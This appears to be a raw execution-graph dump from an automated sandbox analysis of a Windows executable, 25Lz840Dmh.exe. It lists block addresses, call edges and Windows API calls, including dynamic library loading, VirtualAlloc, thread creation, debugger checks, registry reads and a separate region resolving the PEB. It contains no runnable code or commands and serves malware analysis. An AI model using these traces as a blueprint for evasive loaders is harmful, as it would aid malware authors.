104491 bf81aa 104487->104491 104489 bf7e4f 59 API calls 104488->104489 104490 bf8197 CharUpperBuffW 104489->104490 104490->104491 104491->104404 104493 bff251 104492->104493 104494 bff272 104493->104494 104636 c59e4a 89 API calls 4 library calls 104493->104636 104494->104443 104497 bf838d 104496->104497 104498 c2edbd 104496->104498 104499 c10db6 Mailbox 59 API calls 104497->104499 104500 bf8394 104499->104500 104501 bf83b5 104500->104501 104637 bf8634 59 API calls Mailbox 104500->104637 104501->104422 104501->104431 104504 c34cc3 104503->104504 104516 c009f5 104503->104516 104699 c59e4a 89 API calls 4 library calls 104504->104699 104506 c00ce4 104507 c00cfa 104506->104507 104696 c01070 10 API 
calls Mailbox 104506->104696 104507->104452 104509 c00ee4 104509->104507 104511 c00ef1 104509->104511 104697 c01093 341 API calls Mailbox 104511->104697 104512 c00a4b PeekMessageW 104533 c00a05 Mailbox 104512->104533 104515 c00ef8 LockWindowUpdate DestroyWindow GetMessageW 104515->104507 104518 c00f2a 104515->104518 104516->104533 104700 bf9e5d 60 API calls 104516->104700 104701 c46349 341 API calls 104516->104701 104517 c34e81 Sleep 104517->104533 104520 c35c58 TranslateMessage DispatchMessageW GetMessageW 104518->104520 104520->104520 104521 c35c88 104520->104521 104521->104507 104522 bf9e5d 60 API calls 104522->104533 104523 c00e43 PeekMessageW 104523->104533 104524 c00ea5 TranslateMessage DispatchMessageW 104524->104523 104525 c34d50 TranslateAcceleratorW 104525->104523 104525->104533 104526 c3581f WaitForSingleObject 104526->104533 104534 c3583c GetExitCodeProcess CloseHandle 104526->104534 104528 c10db6 59 API calls Mailbox 104528->104533 104529 c00d13 timeGetTime 104529->104533 104530 c00e5f Sleep 104539 c00e70 Mailbox 104530->104539 104531 bf8047 59 API calls 104531->104533 104532 bf7667 59 API calls 104532->104539 104533->104506 104533->104512 104533->104517 104533->104522 104533->104523 104533->104524 104533->104525 104533->104526 104533->104528 104533->104529 104533->104530 104533->104531 104535 c35af8 Sleep 104533->104535 104537 bfb73c 314 API calls 104533->104537 104533->104539 104540 c00f95 104533->104540 104542 c00f4e timeGetTime 104533->104542 104563 bffce0 314 API calls 104533->104563 104566 c59e4a 89 API calls 104533->104566 104568 bf84c0 69 API calls 104533->104568 104569 bf9c90 59 API calls Mailbox 104533->104569 104570 bf9ea0 314 API calls 104533->104570 104572 bf89b3 69 API calls 104533->104572 104573 c4617e 59 API calls Mailbox 104533->104573 104574 c355d5 VariantClear 104533->104574 104575 c3566b VariantClear 104533->104575 104576 bf8cd4 59 API calls Mailbox 104533->104576 104577 c35419 VariantClear 104533->104577 104578 c46e8f 59 API calls 
104533->104578 104579 bf7de1 59 API calls 104533->104579 104638 bfe420 104533->104638 104645 bfe6a0 104533->104645 104676 bff460 104533->104676 104695 bf31ce IsDialogMessageW GetClassLongW 104533->104695 104702 c76018 59 API calls 104533->104702 104703 c59a15 59 API calls Mailbox 104533->104703 104704 c4d4f2 59 API calls 104533->104704 104705 bf9837 104533->104705 104723 c460ef 59 API calls 2 library calls 104533->104723 104724 bf8401 59 API calls 104533->104724 104725 bf82df 59 API calls Mailbox 104533->104725 104534->104540 104535->104539 104537->104533 104539->104532 104539->104533 104539->104540 104541 c1049f timeGetTime 104539->104541 104545 c35b8f GetExitCodeProcess 104539->104545 104551 c75f25 110 API calls 104539->104551 104552 bfb7dd 109 API calls 104539->104552 104553 c35874 104539->104553 104554 c35078 Sleep 104539->104554 104555 c35c17 Sleep 104539->104555 104557 bf7de1 59 API calls 104539->104557 104726 c52408 60 API calls 104539->104726 104727 bf9e5d 60 API calls 104539->104727 104728 bf89b3 69 API calls Mailbox 104539->104728 104729 bfb73c 341 API calls 104539->104729 104730 c464da 60 API calls 104539->104730 104731 c55244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104539->104731 104732 c53c55 66 API calls Mailbox 104539->104732 104540->104452 104541->104539 104698 bf9e5d 60 API calls 104542->104698 104547 c35ba5 WaitForSingleObject 104545->104547 104548 c35bbb CloseHandle 104545->104548 104547->104533 104547->104548 104548->104539 104551->104539 104552->104539 104553->104540 104554->104533 104555->104533 104557->104539 104563->104533 104566->104533 104568->104533 104569->104533 104570->104533 104572->104533 104573->104533 104574->104533 104575->104533 104576->104533 104577->104533 104578->104533 104579->104533 104580->104476 104581->104480 104582->104475 104583->104475 104585 bf9ebf 104584->104585 104600 bf9eed Mailbox 104584->104600 104586 c10db6 Mailbox 59 API calls 104585->104586 104586->104600 104587 
bfb475 104588 bf8047 59 API calls 104587->104588 104603 bfa057 104588->104603 104589 bfb47a 104591 c30055 104589->104591 104606 c309e5 104589->104606 104590 c10db6 59 API calls Mailbox 104590->104600 105932 c59e4a 89 API calls 4 library calls 104591->105932 104595 bf8047 59 API calls 104595->104600 104596 c30064 104596->104443 104599 bf7667 59 API calls 104599->104600 104600->104587 104600->104589 104600->104590 104600->104591 104600->104595 104600->104599 104601 c46e8f 59 API calls 104600->104601 104602 c12d40 67 API calls __cinit 104600->104602 104600->104603 104604 c309d6 104600->104604 104607 bfa55a 104600->104607 105930 bfc8c0 341 API calls 2 library calls 104600->105930 105931 bfb900 60 API calls Mailbox 104600->105931 104601->104600 104602->104600 104603->104443 105934 c59e4a 89 API calls 4 library calls 104604->105934 105935 c59e4a 89 API calls 4 library calls 104606->105935 105933 c59e4a 89 API calls 4 library calls 104607->105933 104608->104480 104609->104405 104610->104409 104611->104413 104612->104409 104613->104409 104614->104420 104615->104432 104616->104427 104617->104427 104618->104430 104619->104434 104620->104475 104621->104475 104622->104475 104623->104475 104625 bf84cb 104624->104625 104626 bf84f2 104625->104626 105936 bf89b3 69 API calls Mailbox 104625->105936 104626->104459 104628->104409 104629->104460 104631 bf805a 104630->104631 104632 bf8052 104630->104632 104631->104467 105937 bf7f77 59 API calls 2 library calls 104632->105937 104634->104469 104635->104409 104636->104494 104637->104501 104639 bfe43d 104638->104639 104640 bfe451 104638->104640 104733 bfdf00 341 API calls 2 library calls 104639->104733 104734 c59e4a 89 API calls 4 library calls 104640->104734 104642 bfe448 104642->104533 104644 c33aa4 104644->104644 104646 bfe6d5 104645->104646 104647 c33aa9 104646->104647 104650 bfe73f 104646->104650 104659 bfe799 104646->104659 104648 bf9ea0 341 API calls 104647->104648 104649 c33abe 104648->104649 104675 bfe970 Mailbox 104649->104675 
104736 c59e4a 89 API calls 4 library calls 104649->104736 104653 bf7667 59 API calls 104650->104653 104650->104659 104651 bf7667 59 API calls 104651->104659 104654 c33b04 104653->104654 104656 c12d40 __cinit 67 API calls 104654->104656 104655 c12d40 __cinit 67 API calls 104655->104659 104656->104659 104657 c33b26 104657->104533 104658 bf84c0 69 API calls 104658->104675 104659->104651 104659->104655 104659->104657 104660 bfe95a 104659->104660 104659->104675 104660->104675 104737 c59e4a 89 API calls 4 library calls 104660->104737 104664 bf9ea0 341 API calls 104664->104675 104666 bf8d40 59 API calls 104666->104675 104668 c59e4a 89 API calls 104668->104675 104671 bff195 104741 c59e4a 89 API calls 4 library calls 104671->104741 104673 c33e25 104673->104533 104674 bfea78 104674->104533 104675->104658 104675->104664 104675->104666 104675->104668 104675->104671 104675->104674 104735 bf7f77 59 API calls 2 library calls 104675->104735 104738 c46e8f 59 API calls 104675->104738 104739 c6c5c3 341 API calls 104675->104739 104740 c6b53c 341 API calls Mailbox 104675->104740 104742 bf9c90 59 API calls Mailbox 104675->104742 104743 c693c6 341 API calls Mailbox 104675->104743 104677 bff4ba 104676->104677 104678 bff650 104676->104678 104679 bff4c6 104677->104679 104680 c3441e 104677->104680 104681 bf7de1 59 API calls 104678->104681 104744 bff290 104679->104744 104852 c6bc6b 104680->104852 104684 bff58c Mailbox 104681->104684 104759 c53c37 104684->104759 104762 c5cb7a 104684->104762 104842 bf4e4a 104684->104842 104848 c6df37 104684->104848 104685 c3442c 104686 bff630 104685->104686 104892 c59e4a 89 API calls 4 library calls 104685->104892 104686->104533 104688 bff4fd 104688->104684 104688->104685 104688->104686 104690 bff5e3 104690->104686 104851 bf9c90 59 API calls Mailbox 104690->104851 104695->104533 104696->104509 104697->104515 104698->104533 104699->104516 104700->104516 104701->104516 104702->104533 104703->104533 104704->104533 104706 bf9851 104705->104706 104715 bf984b 
104705->104715 104707 c2f5d3 __i64tow 104706->104707 104708 bf9899 104706->104708 104709 c2f4da 104706->104709 104711 bf9857 __itow 104706->104711 105928 c13698 83 API calls 4 library calls 104708->105928 104717 c10db6 Mailbox 59 API calls 104709->104717 104721 c2f552 Mailbox _wcscpy 104709->104721 104713 c10db6 Mailbox 59 API calls 104711->104713 104714 bf9871 104713->104714 104714->104715 104716 bf7de1 59 API calls 104714->104716 104715->104533 104716->104715 104718 c2f51f 104717->104718 104719 c10db6 Mailbox 59 API calls 104718->104719 104720 c2f545 104719->104720 104720->104721 104722 bf7de1 59 API calls 104720->104722 105929 c13698 83 API calls 4 library calls 104721->105929 104722->104721 104723->104533 104724->104533 104725->104533 104726->104539 104727->104539 104728->104539 104729->104539 104730->104539 104731->104539 104732->104539 104733->104642 104734->104644 104735->104675 104736->104675 104737->104675 104738->104675 104739->104675 104740->104675 104741->104673 104742->104675 104743->104675 104745 bff43a 104744->104745 104747 bff2bc 104744->104747 104894 c59e4a 89 API calls 4 library calls 104745->104894 104747->104745 104756 bff2f9 _memmove 104747->104756 104748 bff3d3 104749 bff3e3 104748->104749 104893 c6a2d9 85 API calls Mailbox 104748->104893 104749->104688 104751 c10db6 59 API calls Mailbox 104751->104756 104752 c343f9 104896 bff6a3 341 API calls 104752->104896 104754 bf9ea0 341 API calls 104754->104756 104755 c343a9 104755->104688 104756->104748 104756->104751 104756->104752 104756->104754 104756->104755 104757 c343ab 104756->104757 104895 c59e4a 89 API calls 4 library calls 104757->104895 104897 c5445a GetFileAttributesW 104759->104897 104763 bf7667 59 API calls 104762->104763 104764 c5cbaf 104763->104764 104765 bf7667 59 API calls 104764->104765 104766 c5cbb8 104765->104766 104767 c5cbcc 104766->104767 105097 bf9b3c 104766->105097 104769 bf9837 84 API calls 104767->104769 104770 c5cbe9 104769->104770 104771 c5cc0b 104770->104771 104772 c5ccea 
104770->104772 104783 c5cd1a Mailbox 104770->104783 104773 bf9837 84 API calls 104771->104773 104901 bf4ddd 104772->104901 104775 c5cc17 104773->104775 104777 bf8047 59 API calls 104775->104777 104780 c5cc23 104777->104780 104778 c5cd16 104779 bf7667 59 API calls 104778->104779 104778->104783 104782 c5cd4b 104779->104782 104785 c5cc37 104780->104785 104786 c5cc69 104780->104786 104781 bf4ddd 136 API calls 104781->104778 104784 bf7667 59 API calls 104782->104784 104783->104690 104787 c5cd54 104784->104787 104788 bf8047 59 API calls 104785->104788 104789 bf9837 84 API calls 104786->104789 104790 bf7667 59 API calls 104787->104790 104791 c5cc47 104788->104791 104792 c5cc76 104789->104792 104793 c5cd5d 104790->104793 104794 bf7cab 59 API calls 104791->104794 104795 bf8047 59 API calls 104792->104795 104796 bf7667 59 API calls 104793->104796 104797 c5cc51 104794->104797 104798 c5cc82 104795->104798 104799 c5cd66 104796->104799 104800 bf9837 84 API calls 104797->104800 105101 c54a31 GetFileAttributesW 104798->105101 104802 bf9837 84 API calls 104799->104802 104804 c5cc5d 104800->104804 104803 c5cd73 104802->104803 104925 bf459b 104803->104925 104807 bf7b2e 59 API calls 104804->104807 104805 c5cc8b 104808 c5cc9e 104805->104808 104809 bf79f2 59 API calls 104805->104809 104807->104786 104811 bf9837 84 API calls 104808->104811 104817 c5cca4 104808->104817 104809->104808 104810 c5cd8e 104976 bf79f2 104810->104976 104813 c5cccb 104811->104813 105102 c537ef 75 API calls Mailbox 104813->105102 104816 c5cdd1 104819 bf8047 59 API calls 104816->104819 104817->104783 104818 bf79f2 59 API calls 104820 c5cdae 104818->104820 104821 c5cddf 104819->104821 104820->104816 104824 bf7bcc 59 API calls 104820->104824 104979 bf7b2e 104821->104979 104826 c5cdc3 104824->104826 104825 bf7b2e 59 API calls 104827 c5cdfb 104825->104827 104828 bf7bcc 59 API calls 104826->104828 104829 bf7b2e 59 API calls 104827->104829 104828->104816 104830 c5ce09 104829->104830 104831 bf9837 84 API calls 
104830->104831 104832 c5ce15 104831->104832 104988 c54071 104832->104988 104834 c5ce26 104835 c53c37 3 API calls 104834->104835 104836 c5ce30 104835->104836 104837 bf9837 84 API calls 104836->104837 104840 c5ce61 104836->104840 104838 c5ce4e 104837->104838 105042 c59155 104838->105042 104841 bf4e4a 84 API calls 104840->104841 104841->104783 104843 bf4e54 104842->104843 104845 bf4e5b 104842->104845 104844 c153a6 __fcloseall 83 API calls 104843->104844 104844->104845 104846 bf4e7b FreeLibrary 104845->104846 104847 bf4e6a 104845->104847 104846->104847 104847->104690 105809 c6cadd 104848->105809 104850 c6df47 104850->104690 104851->104690 104853 c6bc96 104852->104853 104854 c6bcb0 104852->104854 105920 c59e4a 89 API calls 4 library calls 104853->105920 105921 c6a213 59 API calls Mailbox 104854->105921 104857 c6bcbb 104858 bf9ea0 340 API calls 104857->104858 104859 c6bd1c 104858->104859 104860 c6bdae 104859->104860 104864 c6bd5d 104859->104864 104868 c6bca8 Mailbox 104859->104868 104861 c6be04 104860->104861 104862 c6bdb4 104860->104862 104863 bf9837 84 API calls 104861->104863 104861->104868 105923 c5791a 59 API calls 104862->105923 104865 c6be16 104863->104865 105922 c572df 59 API calls Mailbox 104864->105922 104867 bf7e4f 59 API calls 104865->104867 104871 c6be3a CharUpperBuffW 104867->104871 104868->104685 104869 c6bdd7 105924 bf5d41 59 API calls Mailbox 104869->105924 104876 c6be54 104871->104876 104873 c6bd8d 104875 bff460 340 API calls 104873->104875 104874 c6bddf Mailbox 104880 bffce0 340 API calls 104874->104880 104875->104868 104877 c6bea7 104876->104877 104878 c6be5b 104876->104878 104879 bf9837 84 API calls 104877->104879 105925 c572df 59 API calls Mailbox 104878->105925 104881 c6beaf 104879->104881 104880->104868 105926 bf9e5d 60 API calls 104881->105926 104884 c6be89 104885 bff460 340 API calls 104884->104885 104885->104868 104886 c6beb9 104886->104868 104887 bf9837 84 API calls 104886->104887 104888 c6bed4 104887->104888 105927 bf5d41 59 API calls Mailbox 
104888->105927 104890 c6bee4 104891 bffce0 340 API calls 104890->104891 104891->104868 104892->104686 104893->104749 104894->104755 104895->104755 104896->104755 104898 c53c3e 104897->104898 104899 c54475 FindFirstFileW 104897->104899 104898->104690 104899->104898 104900 c5448a FindClose 104899->104900 104900->104898 105103 bf4bb5 104901->105103 104906 c2d8e6 104908 bf4e4a 84 API calls 104906->104908 104907 bf4e08 LoadLibraryExW 105113 bf4b6a 104907->105113 104910 c2d8ed 104908->104910 104912 bf4b6a 3 API calls 104910->104912 104915 c2d8f5 104912->104915 104914 bf4e2f 104914->104915 104916 bf4e3b 104914->104916 105139 bf4f0b 104915->105139 104917 bf4e4a 84 API calls 104916->104917 104919 bf4e40 104917->104919 104919->104778 104919->104781 104922 c2d91c 105145 bf4ec7 104922->105145 104926 bf7667 59 API calls 104925->104926 104927 bf45b1 104926->104927 104928 bf7667 59 API calls 104927->104928 104929 bf45b9 104928->104929 104930 bf7667 59 API calls 104929->104930 104931 bf45c1 104930->104931 104932 bf7667 59 API calls 104931->104932 104933 bf45c9 104932->104933 104934 c2d4d2 104933->104934 104935 bf45fd 104933->104935 104936 bf8047 59 API calls 104934->104936 104937 bf784b 59 API calls 104935->104937 104938 c2d4db 104936->104938 104939 bf460b 104937->104939 104940 bf7d8c 59 API calls 104938->104940 104941 bf7d2c 59 API calls 104939->104941 104943 bf4640 104940->104943 104942 bf4615 104941->104942 104942->104943 104944 bf784b 59 API calls 104942->104944 104945 bf4680 104943->104945 104947 bf465f 104943->104947 104958 c2d4fb 104943->104958 104948 bf4636 104944->104948 105424 bf784b 104945->105424 104949 bf79f2 59 API calls 104947->104949 104952 bf7d2c 59 API calls 104948->104952 104953 bf4669 104949->104953 104950 bf4691 104954 bf46a3 104950->104954 104956 bf8047 59 API calls 104950->104956 104951 c2d5cb 104955 bf7bcc 59 API calls 104951->104955 104952->104943 104953->104945 104961 bf784b 59 API calls 104953->104961 104957 bf46b3 104954->104957 104962 bf8047 59 API 
calls 104954->104962 104965 c2d588 104955->104965 104956->104954 104960 bf46ba 104957->104960 104963 bf8047 59 API calls 104957->104963 104958->104951 104959 c2d5b4 104958->104959 104973 c2d532 104958->104973 104959->104951 104968 c2d59f 104959->104968 104964 bf8047 59 API calls 104960->104964 104972 bf46c1 Mailbox 104960->104972 104961->104945 104962->104957 104963->104960 104964->104972 104965->104945 104966 bf79f2 59 API calls 104965->104966 105437 bf7924 59 API calls 2 library calls 104965->105437 104966->104965 104967 c2d590 104969 bf7bcc 59 API calls 104967->104969 104970 bf7bcc 59 API calls 104968->104970 104969->104965 104970->104965 104972->104810 104973->104967 104974 c2d57b 104973->104974 104975 bf7bcc 59 API calls 104974->104975 104975->104965 104977 bf7e4f 59 API calls 104976->104977 104978 bf79fd 104977->104978 104978->104816 104978->104818 104980 c2ec6b 104979->104980 104981 bf7b40 104979->104981 105445 c47bdb 59 API calls _memmove 104980->105445 105439 bf7a51 104981->105439 104984 bf7b4c 104984->104825 104985 c2ec75 104986 bf8047 59 API calls 104985->104986 104987 c2ec7d Mailbox 104986->104987 104989 c5408d 104988->104989 104990 c540a0 104989->104990 104991 c54092 104989->104991 104993 bf7667 59 API calls 104990->104993 104992 bf8047 59 API calls 104991->104992 105041 c5409b Mailbox 104992->105041 104994 c540a8 104993->104994 104995 bf7667 59 API calls 104994->104995 104996 c540b0 104995->104996 104997 bf7667 59 API calls 104996->104997 104998 c540bb 104997->104998 104999 bf7667 59 API calls 104998->104999 105000 c540c3 104999->105000 105001 bf7667 59 API calls 105000->105001 105002 c540cb 105001->105002 105003 bf7667 59 API calls 105002->105003 105004 c540d3 105003->105004 105005 bf7667 59 API calls 105004->105005 105006 c540db 105005->105006 105041->104834 105043 c59162 __write_nolock 105042->105043 105044 c10db6 Mailbox 59 API calls 105043->105044 105045 c591bf 105044->105045 105046 bf522e 59 API calls 105045->105046 105047 c591c9 105046->105047 
105448 c58f5f 105047->105448 105098 bf9b52 105097->105098 105099 bf9b4d 105097->105099 105098->104767 105099->105098 105808 c1358a 59 API calls 105099->105808 105101->104805 105102->104817 105150 bf4c03 105103->105150 105106 bf4bdc 105108 bf4bec FreeLibrary 105106->105108 105109 bf4bf5 105106->105109 105107 bf4c03 2 API calls 105107->105106 105108->105109 105110 c1525b 105109->105110 105154 c15270 105110->105154 105112 bf4dfc 105112->104906 105112->104907 105235 bf4c36 105113->105235 105116 bf4b8f 105118 bf4baa 105116->105118 105119 bf4ba1 FreeLibrary 105116->105119 105117 bf4c36 2 API calls 105117->105116 105120 bf4c70 105118->105120 105119->105118 105121 c10db6 Mailbox 59 API calls 105120->105121 105122 bf4c85 105121->105122 105123 bf522e 59 API calls 105122->105123 105124 bf4c91 _memmove 105123->105124 105125 bf4d89 105124->105125 105126 bf4dc1 105124->105126 105130 bf4ccc 105124->105130 105239 bf4e89 CreateStreamOnHGlobal 105125->105239 105250 c5991b 95 API calls 105126->105250 105127 bf4ec7 69 API calls 105136 bf4cd5 105127->105136 105130->105127 105131 bf4f0b 74 API calls 105131->105136 105133 bf4d69 105133->104914 105134 c2d8a7 105135 bf4ee5 85 API calls 105134->105135 105137 c2d8bb 105135->105137 105136->105131 105136->105133 105136->105134 105245 bf4ee5 105136->105245 105138 bf4f0b 74 API calls 105137->105138 105138->105133 105140 bf4f1d 105139->105140 105141 c2d9cd 105139->105141 105274 c155e2 105140->105274 105144 c59109 GetSystemTimeAsFileTime 105144->104922 105146 c2d990 105145->105146 105147 bf4ed6 105145->105147 105406 c15c60 105147->105406 105149 bf4ede 105151 bf4bd0 105150->105151 105152 bf4c0c LoadLibraryA 105150->105152 105151->105106 105151->105107 105152->105151 105153 bf4c1d GetProcAddress 105152->105153 105153->105151 105157 c1527c __freefls@4 105154->105157 105155 c1528f 105203 c18b28 58 API calls __getptd_noexit 105155->105203 105157->105155 105159 c152c0 105157->105159 105158 c15294 105204 c18db6 9 API calls strtoxl 105158->105204 105173 
c204e8 105159->105173 105162 c152c5 105163 c152db 105162->105163 105164 c152ce 105162->105164 105165 c15305 105163->105165 105166 c152e5 105163->105166 105205 c18b28 58 API calls __getptd_noexit 105164->105205 105188 c20607 105165->105188 105206 c18b28 58 API calls __getptd_noexit 105166->105206 105170 c1529f @_EH4_CallFilterFunc@8 __freefls@4 105170->105112 105174 c204f4 __freefls@4 105173->105174 105175 c19c0b __lock 58 API calls 105174->105175 105185 c20502 105175->105185 105176 c20576 105208 c205fe 105176->105208 105177 c2057d 105213 c1881d 58 API calls 2 library calls 105177->105213 105180 c205f3 __freefls@4 105180->105162 105181 c20584 105181->105176 105214 c19e2b InitializeCriticalSectionAndSpinCount 105181->105214 105184 c19c93 __mtinitlocknum 58 API calls 105184->105185 105185->105176 105185->105177 105185->105184 105211 c16c50 59 API calls __lock 105185->105211 105212 c16cba LeaveCriticalSection LeaveCriticalSection _doexit 105185->105212 105186 c205aa EnterCriticalSection 105186->105176 105197 c20627 __wopenfile 105188->105197 105189 c20641 105219 c18b28 58 API calls __getptd_noexit 105189->105219 105191 c207fc 105191->105189 105195 c2085f 105191->105195 105192 c20646 105220 c18db6 9 API calls strtoxl 105192->105220 105194 c15310 105207 c15332 LeaveCriticalSection LeaveCriticalSection _fseek 105194->105207 105216 c285a1 105195->105216 105197->105189 105197->105191 105221 c137cb 60 API calls 3 library calls 105197->105221 105199 c207f5 105199->105191 105222 c137cb 60 API calls 3 library calls 105199->105222 105201 c20814 105201->105191 105223 c137cb 60 API calls 3 library calls 105201->105223 105203->105158 105204->105170 105205->105170 105206->105170 105207->105170 105215 c19d75 LeaveCriticalSection 105208->105215 105210 c20605 105210->105180 105211->105185 105212->105185 105213->105181 105214->105186 105215->105210 105224 c27d85 105216->105224 105218 c285ba 105218->105194 105219->105192 105220->105194 105221->105199 105222->105201 105223->105191 105227 
[Execution graph: the rendered call graph of this report was flattened into a raw node/edge dump (numeric node ids, block addresses and "A->B" edges) and is not reproduced here. The information recoverable from that dump is summarised below.]

Graph nodes are basic-block addresses of 25Lz840Dmh.exe in the 0xbf1016 to 0xc72xxx range, many labelled with C runtime internals (__cinit, __calloc_impl, __freefls@4, __lock_file, __wsopen_nolock, __getptd_noexit, __dosmaperr, __initterm_e, __RTC_Initialize, ___raise_securityfailure, _doexit, _memset, _memmove, _free, _wparse_cmdline, strtoxl, Mailbox, _W_store_winword), plus a second code region at 0x2280000 to 0x228352a whose blocks resolve GetPEB and call Sleep.

Windows API calls that appear as node labels in the graph:

Module and resource loading: LoadLibraryA, GetProcAddress, FreeLibrary, FindResourceExW, LoadResource, SizeofResource, LockResource, LoadStringW, GetModuleFileNameW

Memory, heap, threads and synchronisation: VirtualAlloc, RtlAllocateHeap, GetProcessHeap, TlsAlloc, TlsSetValue, CreateThread, CloseHandle, GetCurrentThreadId, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, Sleep

File, console and path handling: ReadFile, SetFilePointerEx, GetStdHandle, GetFileType, GetConsoleMode, ReadConsoleW, GetLastError, MultiByteToWideChar, CharLowerBuffW, GetOpenFileNameW, GetLongPathNameW, GetTempPathW, GetCurrentDirectoryW, SetCurrentDirectoryW

Process, environment and system information: GetCurrentProcess, TerminateProcess, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStartupInfoW, GetVersionExW, IsWow64Process, GetSystemInfo, GetNativeSystemInfo, IsProcessorFeaturePresent, GetSystemTimeAsFileTime, GetPEB

Registry: RegOpenKeyExW, RegQueryValueExW, RegCloseKey

Debugger and exception handling: IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, EncodePointer, DecodePointer

Window, shell and COM: DefWindowProcW, PostQuitMessage, SetTimer, KillTimer, RegisterWindowMessageW, CreatePopupMenu, Shell_NotifyIconW, MoveWindow, SetFocus, DeleteObject, DestroyWindow, DestroyIcon, IsThemeActive, SystemParametersInfoW, MessageBoxA, OleInitialize
107349 bf9d3c 60 API calls Mailbox 107168->107349 107170->107128 107359 bf9a98 107176->107359 107180 c10db6 Mailbox 59 API calls 107181 c01ff4 107180->107181 107182 c02004 107181->107182 107387 bf57a6 60 API calls Mailbox 107181->107387 107186 bf9837 84 API calls 107182->107186 107183 c36585 107184 c02029 107183->107184 107391 c5f574 59 API calls 107183->107391 107188 bf9b3c 59 API calls 107184->107188 107191 c02036 107184->107191 107187 c02012 107186->107187 107190 bf57f6 67 API calls 107187->107190 107189 c365cd 107188->107189 107189->107191 107192 c365d5 107189->107192 107193 c02021 107190->107193 107195 bf5cdf 2 API calls 107191->107195 107194 bf9b3c 59 API calls 107192->107194 107193->107183 107193->107184 107390 bf58ba CloseHandle 107193->107390 107197 c0203d 107194->107197 107195->107197 107198 c365e7 107197->107198 107199 c02057 107197->107199 107201 c10db6 Mailbox 59 API calls 107198->107201 107200 bf7667 59 API calls 107199->107200 107202 c0205f 107200->107202 107203 c365ed 107201->107203 107372 bf5572 107202->107372 107205 c36601 107203->107205 107392 bf5850 ReadFile SetFilePointerEx 107203->107392 107210 c36605 _memmove 107205->107210 107393 c576c4 59 API calls 2 library calls 107205->107393 107206 c0206e 107206->107210 107388 bf9a3c 59 API calls Mailbox 107206->107388 107211 c02082 Mailbox 107212 c020bc 107211->107212 107213 bf5c6f CloseHandle 107211->107213 107212->107128 107214 c020b0 107213->107214 107214->107212 107389 bf58ba CloseHandle 107214->107389 107217 bf9837 84 API calls 107216->107217 107218 c64494 107217->107218 107219 bf6240 94 API calls 107218->107219 107221 c644a4 107219->107221 107220 c644c9 107223 bf9a98 59 API calls 107220->107223 107224 c644cd 107220->107224 107221->107220 107222 bf9ea0 341 API calls 107221->107222 107222->107220 107223->107224 107224->107128 107226 c6cadd 130 API calls 107225->107226 107227 c6df33 107226->107227 107227->107128 107229 c5d0a5 107228->107229 107230 c5d09a 107228->107230 107234 bf7667 59 API calls 
107229->107234 107273 c5d17f Mailbox 107229->107273 107231 bf9b3c 59 API calls 107230->107231 107231->107229 107232 c10db6 Mailbox 59 API calls 107233 c5d1c8 107232->107233 107235 c5d1d4 107233->107235 107398 bf57a6 60 API calls Mailbox 107233->107398 107236 c5d0c9 107234->107236 107239 bf9837 84 API calls 107235->107239 107238 bf7667 59 API calls 107236->107238 107240 c5d0d2 107238->107240 107241 c5d1ec 107239->107241 107242 bf9837 84 API calls 107240->107242 107243 bf57f6 67 API calls 107241->107243 107244 c5d0de 107242->107244 107245 c5d1fb 107243->107245 107246 bf459b 59 API calls 107244->107246 107247 c5d233 107245->107247 107248 c5d1ff GetLastError 107245->107248 107249 c5d0f3 107246->107249 107253 c5d295 107247->107253 107254 c5d25e 107247->107254 107250 c5d218 107248->107250 107251 bf7b2e 59 API calls 107249->107251 107264 c5d188 Mailbox 107250->107264 107399 bf58ba CloseHandle 107250->107399 107252 c5d126 107251->107252 107255 c5d178 107252->107255 107260 c53c37 3 API calls 107252->107260 107256 c10db6 Mailbox 59 API calls 107253->107256 107257 c10db6 Mailbox 59 API calls 107254->107257 107258 bf9b3c 59 API calls 107255->107258 107261 c5d29a 107256->107261 107262 c5d263 107257->107262 107258->107273 107263 c5d136 107260->107263 107261->107264 107267 bf7667 59 API calls 107261->107267 107265 c5d274 107262->107265 107268 bf7667 59 API calls 107262->107268 107263->107255 107266 c5d13a 107263->107266 107264->107128 107400 c6fbce 59 API calls 2 library calls 107265->107400 107270 bf7de1 59 API calls 107266->107270 107267->107264 107268->107265 107271 c5d147 107270->107271 107397 c53a2a 63 API calls Mailbox 107271->107397 107273->107232 107273->107264 107274 c5d150 Mailbox 107274->107255 107276 bf9837 84 API calls 107275->107276 107277 c722f4 107276->107277 107278 bf7a16 59 API calls 107277->107278 107279 c72303 107278->107279 107280 c72331 107279->107280 107281 bf9b3c 59 API calls 107279->107281 107282 c05a9d 59 API calls 107280->107282 107284 c72314 
107281->107284 107283 c7233a 107282->107283 107285 bf7de1 59 API calls 107283->107285 107284->107280 107286 c72319 107284->107286 107287 c72348 107285->107287 107288 bf8047 59 API calls 107286->107288 107401 c05b12 107287->107401 107291 c72323 Mailbox 107288->107291 107290 c72357 Mailbox 107410 c05bc4 107290->107410 107423 bf9a3c 59 API calls Mailbox 107291->107423 107294 c7240b Mailbox 107294->107128 107296 bf7667 59 API calls 107299 c72389 107296->107299 107297 c723c0 107301 bf7b2e 59 API calls 107297->107301 107302 c723da Mailbox 107297->107302 107299->107297 107300 bf3f74 59 API calls 107299->107300 107413 c461bb 107299->107413 107300->107299 107301->107297 107419 c05ace 107302->107419 107305 bf7667 59 API calls 107304->107305 107306 c6c2f4 107305->107306 107307 bf7667 59 API calls 107306->107307 107308 c6c2fc 107307->107308 107309 bf7667 59 API calls 107308->107309 107310 c6c304 107309->107310 107311 bf9837 84 API calls 107310->107311 107335 c6c312 107311->107335 107312 bf7bcc 59 API calls 107312->107335 107313 bf7924 59 API calls 107313->107335 107314 c6c4fb 107315 c6c528 Mailbox 107314->107315 107427 bf9a3c 59 API calls Mailbox 107314->107427 107315->107128 107317 c6c4e2 107318 bf7cab 59 API calls 107317->107318 107321 c6c4ef 107318->107321 107319 c6c4fd 107322 bf7cab 59 API calls 107319->107322 107320 bf8047 59 API calls 107320->107335 107324 bf7b2e 59 API calls 107321->107324 107325 c6c50c 107322->107325 107323 bf7e4f 59 API calls 107326 c6c3a9 CharUpperBuffW 107323->107326 107324->107314 107327 bf7b2e 59 API calls 107325->107327 107426 bf843a 68 API calls 107326->107426 107327->107314 107328 bf7e4f 59 API calls 107330 c6c469 CharUpperBuffW 107328->107330 107331 bfc5a7 69 API calls 107330->107331 107331->107335 107332 bf9837 84 API calls 107332->107335 